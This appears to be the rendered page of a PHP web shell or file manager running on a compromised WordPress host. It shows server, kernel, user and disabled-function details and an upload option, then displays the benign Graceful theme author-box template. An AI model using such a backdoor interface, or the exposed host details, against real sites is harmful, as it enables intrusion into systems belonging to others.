HEX
Server: Apache
System: Linux server-674799.igrow.ws 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User: elrashedytravel (1025)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/elrashedytravel/public_html/wp-content/themes/graceful/template-parts/single/post-author.php
<?php
/**
 * Template part for Post Author Box below Single Post content
 *
 * @package Graceful
 */

$graceful_author_description = get_the_author_meta( 'description' );

if ( ! empty( $graceful_author_description ) ) : ?>

<div class="author-info">  
	<a class="author-avatar" href="<?php echo esc_url(get_author_posts_url( get_the_author_meta( 'ID' ), get_the_author_meta( 'user_nicename' ) ) ); ?>">
		<?php echo get_avatar( get_the_author_meta( 'ID' ), 90 ); ?>
	</a>

	<h4><?php the_author_posts_link(); ?></h4>
	
	<p><?php the_author_meta( 'description' ); ?></p>
</div>

<?php endif; ?>